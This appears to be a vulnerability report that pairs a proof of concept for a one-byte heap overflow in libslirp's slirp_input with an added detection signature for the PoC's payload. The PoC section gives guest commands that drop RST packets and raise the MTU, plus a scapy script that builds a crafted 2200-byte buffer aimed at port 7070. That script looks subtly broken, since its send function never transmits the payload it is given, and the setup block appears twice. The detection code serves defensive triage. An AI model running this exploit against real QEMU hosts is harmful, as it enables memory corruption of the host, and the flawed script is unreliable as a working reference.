```shell
# iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 10.0.2.2 -j DROP # Because we will use Python to construct TCP packets, this will prevent the kernel from sending RST packets.
# ip link set ens3 mtu 3000 # When the size sent is larger than the default MTU, the slirp_input function allocates space from the heap, and then we can overflow one byte of the heap space.
# ./poc
```
poc:
```python
#!/usr/bin/python3
import os
import time
from scapy.all import *

target_ip = '10.0.2.2'
target_port = 7070


def start_tcp(target_ip, target_port, str_to_send):
    global sport, s_seq, d_seq
    try:
        # Send a SYN (flags=0x2) and record the ports and sequence numbers from the reply
        ans = sr1(IP(dst=target_ip)/TCP(dport=target_port, sport=RandShort(), seq=RandInt(), flags=0x2), verbose=False)
        sport = ans[TCP].dport
        s_seq = ans[TCP].ack
        d_seq = ans[TCP].seq+1
    except Exception as e:
        print(e)


if __name__ == '__main__':
    buf = ['R' for n in range(2200)]
    buf_len = len(buf)
    buf[buf_len-10] = chr(0x50)
    buf[buf_len-9] = chr(0x4e)
    buf[buf_len-8] = chr(0x41)
    buf[buf_len-7] = chr(0x00)
    buf[buf_len-1] = chr(27)
    start_tcp(target_ip, target_port, "".join(buf))
```
In host OS run:
```shell
nc -l -p 7070
```
In guest OS run:
```shell
# iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 10.0.2.2 -j DROP # Because we will use Python to construct TCP packets, this will prevent the kernel from sending RST packets.
# ip link set ens3 mtu 3000 # When the size sent is larger than the default MTU, the slirp_input function allocates space from the heap, and then we can overflow one byte of the heap space.
# ./poc
```
This will cause a one-byte heap overflow.
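
For triage of captured guest traffic, the following signature check is modelled on the payload layout in the PoC above: a TCP payload to port 7070 that is larger than the default MTU, carries the bytes 0x50 0x4e 0x41 0x00 close to its end, and finishes with byte 27. It is an added example, not part of the original report or of libslirp; the function names, the 1500-byte default MTU and the 16-byte tail window are assumptions.

```python
# Added example: signature check modelled on the PoC's payload layout.
# Names and thresholds below are assumptions, not libslirp code.

DEFAULT_MTU = 1500    # assumed standard Ethernet default (the guest raises it to 3000)
WATCHED_PORT = 7070   # destination port used by the PoC
MARKER = bytes([0x50, 0x4E, 0x41, 0x00])  # bytes written at buf_len-10 .. buf_len-7
TAIL_BYTE = 27        # value written at buf_len-1
TAIL_WINDOW = 16      # assumed: how close to the end the marker must sit
FULL_MATCH = {"oversize", "marker-near-end", "tail-0x1b"}


def inspect_payload(dport, payload):
    """Return the reasons a TCP payload resembles the PoC (empty list = no match)."""
    if dport != WATCHED_PORT:
        return []
    reasons = []
    if len(payload) > DEFAULT_MTU:
        reasons.append("oversize")
    pos = payload.rfind(MARKER)
    if pos != -1 and len(payload) - pos <= TAIL_WINDOW:
        reasons.append("marker-near-end")
        if payload[-1] == TAIL_BYTE:
            reasons.append("tail-0x1b")
    return reasons


def is_suspicious(dport, payload):
    """Alert only when all three traits of the PoC layout are present."""
    return set(inspect_payload(dport, payload)) == FULL_MATCH


def poc_shaped_payload(size=2200):
    """Constructed sample that mirrors the buffer built in the PoC."""
    buf = bytearray(b"R" * size)
    buf[size - 10:size - 6] = MARKER
    buf[size - 1] = TAIL_BYTE
    return bytes(buf)


if __name__ == "__main__":
    samples = {
        "poc-shaped": (7070, poc_shaped_payload()),
        "large, no marker": (7070, b"R" * 2200),
        "small with marker": (7070, MARKER + b"R" * 5 + bytes([TAIL_BYTE])),
        "other port": (80, poc_shaped_payload()),
    }
    for name, (port, data) in samples.items():
        print(f"{name:18} {inspect_payload(port, data)} alert={is_suspicious(port, data)}")
```

The partial reasons returned by `inspect_payload` are useful for tuning: an oversize payload alone is common, so alerting only on the full set keeps false positives down.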